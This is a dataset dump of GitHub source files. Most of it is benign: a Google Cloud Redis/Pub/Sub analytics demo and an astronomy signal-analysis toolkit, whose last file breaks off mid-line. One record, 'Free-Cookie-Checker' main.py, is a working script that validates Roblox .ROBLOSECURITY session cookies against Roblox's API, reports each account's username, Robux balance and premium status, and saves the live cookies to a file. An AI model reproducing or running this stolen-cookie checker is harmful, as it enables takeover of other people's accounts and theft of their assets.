variantCombination);\n\n ImmutableSet<String> variantCombinationSet\n = Arrays.stream(variantCombination).map(name -> name.replaceFirst(\"set_var_\", \"\"))\n .collect(toImmutableSet());\n\n return OverlapMetric.builder()\n .setDimensions(variantCombinationSet)\n .setMetric(redisClient.scard(sinterStoreKey))\n .build();\n })\n .collect(toImmutableSet());\n }\n\n @GetMapping(\"/times\")\n public DateTime[] getTimeString(\n @RequestParam(required = false, defaultValue = \"10\") Integer lastMinutes) {\n return timePatternForLastMinutes(lastMinutes);\n }\n\n private static DateTime[] timePatternForLastMinutes(int pastMinutes) {\n DateTime startTime = DateTime.now(DateTimeZone.UTC).minuteOfHour().roundFloorCopy();\n\n return IntStream.rangeClosed(1, pastMinutes)\n .boxed()\n .map(Duration::standardMinutes)\n .map(startTime::minus)\n .toArray(DateTime[]::new);\n }\n}\n"
},
{
"alpha_fraction": 0.7240583896636963,
"alphanum_fraction": 0.7302075624465942,
"avg_line_length": 29.255813598632812,
"blob_id": "304f06bc333fb5bf0db39fd25075f8406ea0d0b6",
"content_id": "2fcebee96d92bda317454e58970149b76296e576",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1301,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 43,
"path": "/dashboard/src/main/java/com/google/cloud/solutions/realtimedash/dashboard/TimeSeriesKeyBuilder.java",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.google.cloud.solutions.realtimedash.dashboard;\n\nimport java.util.Arrays;\nimport org.joda.time.DateTime;\n\npublic class TimeSeriesKeyBuilder {\n\n private final String dateTimeFormatter;\n\n private TimeSeriesKeyBuilder(String prefix) {\n this.dateTimeFormatter = \"'\" + prefix + \"'\" + \"_yyyy_MM_dd'T'HH_mm\";\n }\n\n public String buildTimeKey(DateTime dateTime) {\n return dateTime.toString(dateTimeFormatter);\n }\n\n public String[] buildTimeKeys(DateTime[] dateTimes) {\n return Arrays.stream(dateTimes)\n .map(this::buildTimeKey)\n .toArray(String[]::new);\n }\n\n public static TimeSeriesKeyBuilder forPrefix(String prefix) {\n return new TimeSeriesKeyBuilder(prefix);\n }\n}\n"
},
{
"alpha_fraction": 0.6607452630996704,
"alphanum_fraction": 0.6722270250320435,
"avg_line_length": 33.44776153564453,
"blob_id": "130ab7030808e46c56940980b9c0ab475b88ac56",
"content_id": "eb79a3516917b1a57e4fa2d1045a68404af91036",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4616,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 134,
"path": "/loggen/message_generator.py",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Pushes defined number of random messages to the Pub/Sub.\"\"\"\n\nimport argparse\nimport datetime\nimport json\nimport random\nimport signal\nimport sys\nimport time\n\nfrom google.cloud import pubsub_v1\n\n# Configure Command line parser for arguments\ncmd_flags_parser = argparse.ArgumentParser(\n description='Publish messages to Pub/Sub',\n prefix_chars='-')\ncmd_flags_parser.add_argument('--event_count', type=int,\n help='Number of log events to generate',\n default=-1)\ncmd_flags_parser.add_argument('--topic', type=str,\n help='Name of the Pub/Sub topic')\ncmd_flags_parser.add_argument('--project-id', type=str,\n help='GCP Project Id running the Pub/Sub')\ncmd_flags_parser.add_argument('--enable-log', type=bool,\n default=False,\n help='print logs')\n\n# Extract command-line arguments\ncmd_arguments = cmd_flags_parser.parse_args()\n\n# Define configuration\n_LOGGING_ENABLED = cmd_arguments.enable_log\n_EXPERIMENT_VARIANTS = ['default', '1', '2', '3']\n_SEND_EVENTS_COUNT = cmd_arguments.event_count # Default send infinite messages\n_PUB_SUB_TOPIC = cmd_arguments.topic\n_GCP_PROJECT_ID = cmd_arguments.project_id\n_PUBLISHER = pubsub_v1.PublisherClient()\n_START_TIME = time.time()\n_TOPIC_PATH = _PUBLISHER.topic_path(_GCP_PROJECT_ID, _PUB_SUB_TOPIC)\n\nmessage_count = 0\n\n\ndef build_user_id():\n \"\"\"\n Generates random user ids with some overlap to simulate a real world\n user behaviour on an app or website.\n :return: A slowly changing random number.\n \"\"\"\n elapsed_tens_minutes = int((time.time() - _START_TIME) / 600) + 1\n present_millis = int(1000 * (time.time() - int(time.time())))\n\n if present_millis == 0:\n present_millis = random.randint(1,1000)\n\n if _LOGGING_ENABLED:\n print(\n 'generating user_id: elapsed_tens_minute = {}, present_millis = {}'.format(\n elapsed_tens_minutes, present_millis))\n\n return random.randint(elapsed_tens_minutes + present_millis,\n (10 + elapsed_tens_minutes) * present_millis)\n\n\ndef build_message():\n \"\"\" Generates an event message imitation\n :return: A random event message\n \"\"\"\n return dict(\n uid=build_user_id(),\n # change experiment ids based on date/time\n experiment_id=random.randint(1, 100),\n variant=_EXPERIMENT_VARIANTS[random.randint(0, 3)],\n timestamp=datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'))\n\n\ndef send_to_pub_sub(message):\n \"\"\" Sends the provided payload as JSON to Pub/Sub.\n :param message: the Event information payload\n :return: the published message future.\n \"\"\"\n return _PUBLISHER.publish(_TOPIC_PATH,\n data=json.dumps(message).encode('utf-8'))\n\n\ndef print_message_count_before_exit(sig, frame):\n \"\"\" Interrupt handler to print the count of messages sent to pub/sub before\n exiting python.\n :param sig: the interrupt signal.\n :param frame: the stackframe.\n \"\"\"\n print('\\nSent {} messages.\\nExiting'.format(message_count))\n sys.exit(0)\n\n\n# Register message count printer\nsignal.signal(signal.SIGINT, print_message_count_before_exit)\n\nprint('ProjectId: {}\\nPub/Sub Topic: {}'.format(_GCP_PROJECT_ID, _TOPIC_PATH))\nprint('Sending events in background.')\nprint('Press Ctrl+C to exit/stop.')\n\n# Infinite loop to keep sending messages to pub/sub\nwhile _SEND_EVENTS_COUNT == -1 or message_count < _SEND_EVENTS_COUNT:\n event_message = build_message()\n if (_LOGGING_ENABLED):\n print('Sending Message {}\\n{}'.format(message_count + 1,\n json.dumps(event_message)))\n\n message_count += 1\n pub_sub_message_unique_id = send_to_pub_sub(event_message)\n\n if (_LOGGING_ENABLED):\n print(\n 'pub_sub_message_id: {}'.format(pub_sub_message_unique_id.result()))\n\n _sleep_time = random.randint(10, 10000) # Random sleep time in milli-seconds.\n if (_LOGGING_ENABLED):\n print('Sleeping for {} ms'.format(_sleep_time))\n time.sleep(_sleep_time / 1000)\n"
},
{
"alpha_fraction": 0.8518518805503845,
"alphanum_fraction": 0.8518518805503845,
"avg_line_length": 12.5,
"blob_id": "bc28ae50b698f5cbf5c28aac6132abf0a5b5fec2",
"content_id": "6b36ce54f7c2fb9b2038d7fb4d99124ea03a93d1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 27,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 2,
"path": "/loggen/requirements.txt",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "google\ngoogle-cloud-pubsub\n"
}
] | 9 |
seanshocker/Free-Cookie-Checker | https://github.com/seanshocker/Free-Cookie-Checker | 5ce6c7771d701358037da64e994f18b1cd14ab49 | fdf314637894f0b9896ba1de00c7d897d1b6a69a | cb94467bcc43c0d57208c4cd1af06f78979335dd | refs/heads/main | 2023-01-21T10:20:13.570009 | 2020-11-28T09:14:35 | 2020-11-28T09:14:35 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.3521551787853241,
"alphanum_fraction": 0.35517242550849915,
"avg_line_length": 56.04999923706055,
"blob_id": "333d4e7893b6fc9e4d9d55554c10b858c817f890",
"content_id": "7fd3c6cbabd10c66c1ff907c8eff0bca54fb682a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2320,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 40,
"path": "/main.py",
"repo_name": "seanshocker/Free-Cookie-Checker",
"src_encoding": "UTF-8",
"text": "import requests\r\nimport time\r\nimport json\r\nimport termcolor\r\ndef watermark(text):\r\n print(termcolor.colored(text, \"blue\"))\r\nwatermark(\"___________ .__ _________ __ .__ _________ .__ __ \")\r\nwatermark(\"\\_ _____/______|__| ____ ____ ___ ___ ______ \\_ ___ \\ ____ ____ | | _|__| ____ \\_ ___ \\| |__ ____ ____ | | __ ___________ \")\r\nwatermark(\" | __) \\_ __ \\ |/ _ \\ / \\\\ \\/ / / ___/ / \\ \\/ / _ \\ / _ \\| |/ / |/ __ \\ / \\ \\/| | \\_/ __ \\_/ ___\\| |/ // __ \\_ __ \\\\\")\r\nwatermark(\" | \\ | | \\/ ( <_> ) | \\> < \\___ \\ \\ \\___( <_> | <_> ) <| \\ ___/ \\ \\___| Y \\ ___/\\ \\___| <\\ ___/| | \\/\")\r\nwatermark(\" \\___ / |__| |__|\\____/|___| /__/\\_ \\/____ > \\______ /\\____/ \\____/|__|_ \\__|\\___ > \\______ /___| /\\___ >\\___ >__|_ \\\\___ >__| \")\r\nwatermark(\" \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \")\r\nprint(termcolor.colored(\"Frionx's Cookie Checker\", \"blue\"))\r\ntext_file = open(\"cookies.txt\", \"r\")\r\nlines = text_file.readlines()\r\napiUrl = \"http://www.roblox.com/mobileapi/userinfo\"\r\ni = 0\r\nfor i in range(0, len(lines)):\r\n cookie = {'.ROBLOSECURITY': lines[i].replace(\"\\n\", \"\")}\r\n x = requests.get(apiUrl, cookies=cookie)\r\n if (x.status_code == 200):\r\n if \"<meta name\" in x.text:\r\n print(termcolor.colored(\"Cookie did not properly work\", \"red\"))\r\n else:\r\n respJson = json.loads(x.text)\r\n username = respJson[\"UserName\"]\r\n robux = respJson[\"RobuxBalance\"]\r\n premium = False\r\n if respJson['IsPremium'] == \"true\":\r\n premium = True\r\n else:\r\n premium = False\r\n print(termcolor.colored(\"Username: \" + str(username) + \" | Robux: \" + str(robux) + \" | Premium: \" + str(premium) + \" | Cookie: \" + str(lines[i]), \"green\"))\r\n with open(\"success.txt\", \"a\") as myfile:\r\n myfile.write(str(lines[i]))\r\n time.sleep(0.3)\r\n else:\r\n print(termcolor.colored(\"Request did not properly work\", \"red\"))\r\n\r\ninput(termcolor.colored(\"Press enter to close\", \"red\"))"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 21,
"blob_id": "7006559f85001ce8d4de7f875330c136f0a01ed5",
"content_id": "fdadda2ae2981e3f6362d0927e83651f003c295e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 1,
"path": "/README.md",
"repo_name": "seanshocker/Free-Cookie-Checker",
"src_encoding": "UTF-8",
"text": "# Free-Cookie-Checker"
}
] | 2 |
Omaam/csa | https://github.com/Omaam/csa | 6927b1c341e734a76f73d182fe884e503bb061fb | 35abd558a10b2d8e4dd0d90dcfed6c257432a467 | 2243f926a1eaacde3b446bd5d56b62b2b30b799c | refs/heads/main | 2023-05-07T11:59:29.863020 | 2021-06-03T10:59:49 | 2021-06-03T10:59:49 | 323,592,346 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5551576018333435,
"alphanum_fraction": 0.5805873870849609,
"avg_line_length": 26.920000076293945,
"blob_id": "0faa746019979d8657f221656de4cee819787c28",
"content_id": "076f0939a242be0cf7663a9372b94418a934b155",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2792,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 100,
"path": "/example/simdata/plsimulation.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\n\ndef mkmat(t, f):\n t = np.array([t])\n f = np.array([f])\n phase = 2 * np.pi * np.dot(t.T, f)\n mat = np.hstack([np.cos(phase), np.sin(phase)])\n return mat\n\ndef get_frecvec(low, hig, num):\n freq_edge = np.linspace(low, hig, int(num + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\ndef powerlaw(freq_vec, beta=2):\n pow_vec = freq_vec ** -beta\n return pow_vec\n\ndef get_plsimulation(n_time, lag, f_vec, seed=69):\n '''return y1_data, y2_data: ndarray\n '''\n assert isinstance(lag, int), 'lag must be int'\n\n # rondom phase\n np.random.seed(seed)\n power_vec = powerlaw(f_vec)\n realpart_vec = np.random.normal(0, 0.5 * np.sqrt(power_vec))\n imagpart_vec = np.random.normal(0, 0.5 * np.sqrt(power_vec))\n\n # calculation\n x_vec = np.hstack([realpart_vec, imagpart_vec])\n delta_f = np.diff(f_vec).mean()\n t_vec = np.linspace(0, 2 * n_time - 1, 2* n_time)\n A_mat = 2 * delta_f * mkmat(t_vec, f_vec)\n y_vec = np.dot(A_mat, x_vec)\n data1 = np.array([t_vec[:n_time], y_vec[lag:lag+n_time]]).T\n data2 = np.array([t_vec[:n_time], y_vec[:n_time]]).T\n return data1, data2\n\ndef psd(f_vec, ax=None, seed=69):\n # random phase\n np.random.seed(seed)\n power_vec = powerlaw(f_vec)\n realpart_vec = np.random.normal(0, 0.5 * np.sqrt(power_vec))\n imagpart_vec = np.random.normal(0, 0.5 * np.sqrt(power_vec))\n ranpower = realpart_vec ** 2 + imagpart_vec ** 2\n\n # plot\n if ax is None:\n fig, ax = plt.subplots()\n ax.plot(f_vec, ranpower, label='randomized power')\n ax.plot(f_vec, power_vec, label=r'$S(f)\\sim f^{-2}$')\n ax.set_yscale('log')\n ax.set_xscale('log')\n ax.set_xlabel('freq')\n ax.set_ylabel('power')\n ax.legend(loc='best')\n return ax\n\ndef main():\n\n # frequency\n freq_lo = 0\n freq_hi = 0.5\n nfreq = 2500\n f_vec = get_frecvec(freq_lo, freq_hi, nfreq)\n\n # calculation\n n_time = 5000\n lag = 5\n xdata, odata = get_plsimulation(n_time, lag, f_vec, seed=69)\n np.savetxt('xdata.dat', xdata)\n np.savetxt('odata.dat', odata)\n\n # plot lc\n fig, ax = plt.subplots(2, sharex=True)\n ax[0].plot(odata[:, 0], odata[:, 1])\n ax[0].set_ylabel('flux')\n ax[1].plot(xdata[:, 0], xdata[:, 1])\n ax[1].set_xlabel('time')\n ax[1].set_ylabel('flux')\n plt.tight_layout()\n plt.show()\n\n # plot lc and psd\n # fig, ax = plt.subplots(2, figsize=(5,7))\n # ax[0].plot(odata[:, 0], odata[:, 1])\n # ax[0].set_xlabel('time')\n # ax[0].set_ylabel('flux')\n # psd(f_vec, ax=ax[1], seed=69)\n # plt.tight_layout()\n # fig.savefig('test_half.pdf')\n # plt.show()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5282926559448242,
"alphanum_fraction": 0.5575609803199768,
"avg_line_length": 25.973684310913086,
"blob_id": "8aaa03044eaaf4eecffe60ad1a6bd5d9448d4f13",
"content_id": "3b28e562789c15313269454eb1ae042295a1be50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2050,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 76,
"path": "/example/_stft_test.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.append('..')\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\nfrom window_function import WindowGenerator\n\ndef main():\n # setting\n infile1 = 'xdata.dat'\n infile2 = 'odata.dat'\n freqinfo = [0, 0.5, 2000]\n lambdainfo = [1e-1, 1e2, 20]\n nsegment = 1000\n noverlap = 500\n\n # read data\n xdata = np.loadtxt(infile1)\n odata = np.loadtxt(infile2)\n time = xdata[:,0]\n x = xdata[:,1]\n o = odata[:,1]\n\n # figure\n t = xdata[:1000, 0]\n y = xdata[:1000, 1]\n y_d = y - y.mean()\n window = WindowGenerator((t[0], t[-1]))\n window.hann()\n y_w = window.gene(t) * y\n y_dw = window.gene(t) * y_d\n y_adw = window.gene(t) * y_d + y.mean()\n plt.plot(t, y, t, y_w, t, y_dw, t, y_adw)\n plt.legend(['Original', 'Filter(original)',\n 'Filter(deviation)', 'Ave. + Filter(deviation)'])\n plt.xlabel('time')\n plt.ylabel('flux')\n plt.tight_layout()\n plt.savefig('example_ori_vs_win.png')\n plt.show()\n\n f, t, Zxx_x = signal.stft(xdata[:,1], 1,\n nperseg=nsegment, noverlap=noverlap)\n f, t, Zxx_o = signal.stft(odata[:,1], 1,\n nperseg=nsegment, noverlap=noverlap)\n print(f't: {t.shape}')\n print(f't: {t}')\n print(f'f: {f.shape}')\n print(f'Zxx_x: {Zxx_x.shape}')\n print(f'Zxx_o: {Zxx_o.shape}')\n\n # plot\n fig, ax = plt.subplots(2, sharex=True)\n ax[0].pcolormesh(t, f, np.log10(np.abs(Zxx_o)), shading='gouraud')\n ax[0].set_ylabel('Frequency [Hz]')\n ax[0].set_title('STFT Magnitude')\n\n ax[1].pcolormesh(t, f, np.log10(np.abs(Zxx_x)), shading='gouraud')\n ax[1].set_ylabel('Frequency [Hz]')\n ax[1].set_xlabel('Time [sec]')\n plt.show()\n\n _, xrec = signal.istft(Zxx_x, 1)\n plt.figure()\n plt.plot(_, xrec, time, x, time, o)\n # plt.xlim(0, 1000)\n plt.xlabel('Time [sec]')\n plt.ylabel('Signal')\n plt.legend(['Filtered via STFT', 'True Carrier'])\n plt.show()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5306543707847595,
"alphanum_fraction": 0.5585291981697083,
"avg_line_length": 31.4536075592041,
"blob_id": "42e30e2ccc204d57fc64b6cd5dfa817221ff0d44",
"content_id": "0df22e935b6109eb2b8e9ee2bfb261ed5f528e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12592,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 388,
"path": "/example/windowtest/test.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from concurrent.futures import ProcessPoolExecutor, as_completed\nimport time\nimport os\nncpu = os.cpu_count()\nMAX_WORKERS = ncpu\nprint(f'number of cpu: {ncpu}')\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom scipy import interpolate\nfrom sklearn.model_selection import KFold\nfrom tqdm import tqdm, trange\n\nfrom csa.make_matrix import mkmat_cs, mkmat_cs_w\nfrom csa.fista import fista\nfrom csa.window_function import WindowGenerator\nfrom csa.summary_handler import SummaryNew\nfrom csa.deco import stopwatch, change_directory\nimport csa.xhandler as xhan\nfrom csa.cvresult import show_cvdata, lambda_fromcvdata\n\n__all__ = ['cs', 'cv', 'stcs', 'istcs']\n\n\n# analysis option\nCV = 0\nSTCS = 1\nISTCS = 1\n\nFIGSHOW = 1\n\n\n# functions for csa\ndef _sub_ave(flux):\n f = np.array(flux)\n f_out = f - f.mean()\n return f_out\n\n\ndef _get_minmax(*args):\n a = np.hstack(args)\n return a.min(), a.max()\n\ndef _get_frecvec(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\n\ndef _complement_index(ind):\n comp = np.ones(len(ind), dtype=bool)\n comp[ind] = False\n return comp\n\n\ndef _query_lightcurve(data, timerage):\n data_out = data[np.where((timerage[0] <= data[:,0]) & (data[:,0] < timerage[1]))]\n return data_out\n\n\ndef _drop_sample(data, rate):\n n_data = data.shape[0]\n n_drop = int(n_data * rate)\n index_drop = np.random.RandomState().choice(\n n_data - 1, n_drop, replace=False)\n data_del = np.delete(data, index_drop, 0)\n return data_del\n\n\ndef _segment_time(t_sta, t_end, tperseg, toverlap):\n # set constant\n tstep = tperseg - toverlap\n nstep = (t_end - t_sta - tperseg) // tstep + 2\n\n # calcurate edge of lefts and rights\n edge_left = t_sta + np.arange(nstep)*tstep\n edge_right = t_sta + tperseg + np.arange(nstep)*tstep\n\n # concat edges\n segranges = np.array(list(zip(edge_left, edge_right)))\n return segranges\n\n\ndef _search_index(original, condition):\n l = list(original)\n indices = np.array(list(map(lambda a: l.index(a),\n condition)))\n return indices\n\n\n# main functions; cs, cv stcs istcs\ndef cs(data1, data2, freqinfo, lam):\n freqs, x = fista(data1, data2, freqinfo, lam)\n return freqs, x\n\n\ndef _cv(data1, data2, freqinfo, lam, nfold=5, droprate=None):\n\n # drop sample\n if droprate:\n data1 = _drop_sample(data1, droprate)\n data2 = _drop_sample(data2, droprate)\n\n # freq vector\n freqs = _get_frecvec(freqinfo)\n\n # get nfold index\n kf1 = KFold(nfold, shuffle=True)#, random_state=1)\n kf2 = KFold(nfold, shuffle=True)#, random_state=2)\n sp1 = kf1.split(data1)\n sp2 = kf2.split(data2)\n\n # cross-validation\n rms = np.zeros(nfold)\n for i, ((i_tr1, i_te1), (i_tr2, i_te2)) in enumerate(zip(sp1, sp2)):\n # split data into one for train and test\n data1_tr, data1_te = data1[i_tr1], data1[i_te1]\n data2_tr, data2_te = data2[i_tr2], data2[i_te2]\n\n # calcurate rms\n freq, x_tr = fista(data1_tr, data2_tr, freqinfo, lam)\n A_mat_te = mkmat_cs(data1_te[:,0], data2_te[:,0], freqs)\n y_te = np.dot(A_mat_te, x_tr)\n data_te = np.hstack([data1_te[:,1], data2_te[:,1]])\n rms[i] = np.sqrt(np.dot((data_te - y_te).T, data_te - y_te))\n return rms.mean(), rms.std()\n\n\n@stopwatch\ndef cv(data1, data2, freqinfo, lambdainfo, nfold=5, droprate=None):\n\n # use window and subtract average\n data1_win = data1.copy()\n data2_win = data2.copy()\n t_minmax = _get_minmax(data1[:,0], data2[:,0])\n window = WindowGenerator(t_minmax)\n window.hann()\n data1_win[:,1] = _sub_ave(data1[:,1]) * window.gene(data1[:,0])\n data2_win[:,1] = _sub_ave(data2[:,1]) * window.gene(data2[:,0])\n\n\n # set lambda info\n lambdas = np.logspace(np.log10(lambdainfo[0]),\n np.log10(lambdainfo[1]),\n lambdainfo[2])\n print('lambdas:\\n{}'.format(lambdas))\n\n # cross-validation with multi process\n cvdata = np.zeros((3, lambdas.shape[0])).T\n cvdata[:,0] = lambdas\n with ProcessPoolExecutor(MAX_WORKERS) as executor:\n futures = tqdm([executor.submit(_cv, lam=lam,\n data1=data1_win,\n data2=data2_win,\n freqinfo=freqinfo,\n droprate=droprate)\n for lam in lambdas])\n for k, future in enumerate(futures):\n cvdata[k,1:] = future.result()\n\n return cvdata\n\n\ndef _stcs(data1, data2, segrange, freqinfo, lam, droprate=None):\n # print(f'start {segrange}')\n\n # query time which is in segrange\n data1_seg = _query_lightcurve(data1, segrange)\n data2_seg = _query_lightcurve(data2, segrange)\n data1_seg_win = data1_seg.copy()\n data2_seg_win = data2_seg.copy()\n\n # use window fuction\n window = WindowGenerator(segrange)\n window.hann()\n data1_seg_win[:,1] = _sub_ave(data1_seg[:,1]) * window.gene(data1_seg[:,0])\n data2_seg_win[:,1] = _sub_ave(data2_seg[:,1]) * window.gene(data2_seg[:,0])\n # data1_seg_win[:,1] = data1_seg[:,1] * window.gene(data1_seg[:,0])\n # data2_seg_win[:,1] = data2_seg[:,1] * window.gene(data2_seg[:,0])\n acf = window.acf\n ecf = window.ecf\n\n # drop rows\n if droprate:\n data1_seg_win = _drop_sample(data1_seg_win, droprate)\n data2_seg_win = _drop_sample(data2_seg_win, droprate)\n\n # estimate\n freq, x_seg = fista(data1_seg_win, data2_seg_win, freqinfo, lam)\n return x_seg\n\n@stopwatch\ndef stcs(data1, data2, freqinfo, lam, tperseg, toverlap,\n window='hann', x_name='X.dat', droprate=None):\n\n # calucurate segranges\n t_min, t_max = _get_minmax(data1[:,0], data2[:,0])\n segranges = _segment_time(t_min, t_max, tperseg, toverlap)\n\n # load infile\n df_data1 = pd.DataFrame(data1)\n df_data2 = pd.DataFrame(data2)\n\n # output condition\n df_stcsinfo = pd.DataFrame({'cols': ['freq_lo', 'freq_up',\n 'nfreq', 'lambda',\n 'tperseg', 'toverlap'],\n 'vals': [freqinfo[0], freqinfo[1],\n freqinfo[2], lam,\n tperseg, toverlap]})\n df_stcsinfo.to_csv('stcsinfo.txt', sep=' ', header=False, index=False)\n print(df_stcsinfo)\n\n # short time CS with multithread\n X = np.zeros((freqinfo[2]*4, segranges.shape[0]))\n with ProcessPoolExecutor(MAX_WORKERS) as executor:\n futures = tqdm([executor.submit(_stcs, segrange=segrange,\n data1=data1, data2=data2,\n freqinfo=freqinfo,\n lam=lam, droprate=droprate)\n for segrange in segranges])\n for i, future in enumerate(futures):\n X[:,i] = future.result()\n\n # output\n t = np.mean(segranges, axis=1)\n freq = _get_frecvec(freqinfo)\n np.savetxt(x_name, X)\n return freq, t, X\n\ndef _istcs(x, segrange, data1, data2, freqinfo, need_sect, **winargs):\n # print(f'start {segrange}')\n\n # query time which is in segrange\n data1_seg = _query_lightcurve(data1, segrange)\n data2_seg = _query_lightcurve(data2, segrange)\n data1_seg_out = data1_seg.copy()\n data2_seg_out = data2_seg.copy()\n\n # make summary instance\n # (later summary instance -> x instance)\n summ = SummaryNew(x, freqinfo)\n y1, y2 = summ.pred(data1_seg[:,0], data2_seg[:,0])\n\n # reconstruct\n window = WindowGenerator(segrange)\n window.triang(winargs['winargs']['basewidth'])\n wy1 = window.gene(data1_seg[:,0]) * (y1 + data1[:,1].mean())\n wy2 = window.gene(data2_seg[:,0]) * (y2 + data2[:,1].mean())\n\n # substitution; to conserve energy, it is divided by\n # Energy Correction Factor (ECF)\n win_sect = window.sect\n data1_seg_out[:,1] = wy1 * (need_sect/win_sect)\n data2_seg_out[:,1] = wy2 * (need_sect/win_sect)\n\n # print(f'finish {segrange}')\n return data1_seg_out, data2_seg_out\n\n\n@stopwatch\ndef istcs(X, data1, data2, freqinfo, tperseg, toverlap, **winargs):\n '''\n T: ndarray\n The series of start time of each segment\n '''\n # calucurate segranges\n t_min, t_max = _get_minmax(data1[:,0], data2[:,0])\n segranges = _segment_time(t_min, t_max, tperseg, toverlap)\n\n # prepare ndarray for reconstraction\n y1_rec = data1.copy()\n y2_rec = data2.copy()\n y1_rec[:,1] = np.zeros(data1.shape[0])\n y2_rec[:,1] = np.zeros(data2.shape[0])\n\n with ProcessPoolExecutor(MAX_WORKERS) as executor:\n need_sect = (tperseg - toverlap) * 1\n futures = tqdm([executor.submit(_istcs, x=x, segrange=segrange,\n data1=data1, data2=data2,\n freqinfo=freqinfo, need_sect=need_sect,\n winargs=winargs)\n for segrange, x in zip(segranges, X.T)])\n for i, future in enumerate(futures):\n # get results\n data1_seg_out, data2_seg_out = future.result()\n\n # search index\n indices_t1 = _search_index(data1[:,0], data1_seg_out[:,0])\n indices_t2 = _search_index(data2[:,0], data2_seg_out[:,0])\n\n # add results\n y1_rec[indices_t1, 1] = y1_rec[indices_t1, 1] \\\n + data1_seg_out[:,1]\n y2_rec[indices_t2, 1] = y2_rec[indices_t2, 1] \\\n + data2_seg_out[:,1]\n\n return y1_rec, y2_rec\n\n\n@change_directory('..')\ndef main():\n print(os.getcwd())\n\n # constant\n tperseg = 1000\n toverlap = 500\n basewidth_triang = 2*(tperseg - toverlap)\n\n # load data\n data1 = np.loadtxt('xdata.dat')\n data2 = np.loadtxt('odata.dat')\n n1 = data1.shape[0]\n n2 = data2.shape[0]\n freqinfo = [0, 0.5, 2000]\n\n # cross-validation\n if CV:\n cv_sta = np.random.randint(toverlap, np.min([n1, n2]) - tperseg)\n cv_end = cv_sta + tperseg\n print(f'time range of cv: [{cv_sta}, {cv_end}]')\n cvdata = cv(data1[cv_sta:cv_end], data2[cv_sta:cv_end], freqinfo,\n [1e-2, 1e3, 20])\n np.savetxt('cvdata.dat', cvdata)\n\n # plot cvdata\n show_cvdata(cvdata)\n plt.savefig('cvcurve.png')\n if FIGSHOW:\n plt.show()\n cvdata = np.loadtxt('./cvdata.dat')\n lam_min = lambda_fromcvdata(cvdata, mode='min')\n print(f'lam_min = {lam_min:.3f}')\n\n # short-time common signal analysis\n if STCS:\n freqs, t, X = stcs(data1, data2, freqinfo, lam_min,\n tperseg, toverlap, droprate=0.1)\n np.savetxt('time.dat', t)\n np.savetxt('freq.dat', freqs)\n\n\n # inverse short-time common signal analysis\n if ISTCS:\n X = np.loadtxt('X.dat')\n print(X.shape)\n\n # query lag comp. around true lag\n X_lag = xhan.signiftest(X, freqinfo, testrange=[-10, 10])\n X_lag = xhan.query_forX(X, freqinfo, 'lag', [3, 5])\n X_rem = xhan.subtractX(X, X_lag)\n\n # istcs\n y1_rec, 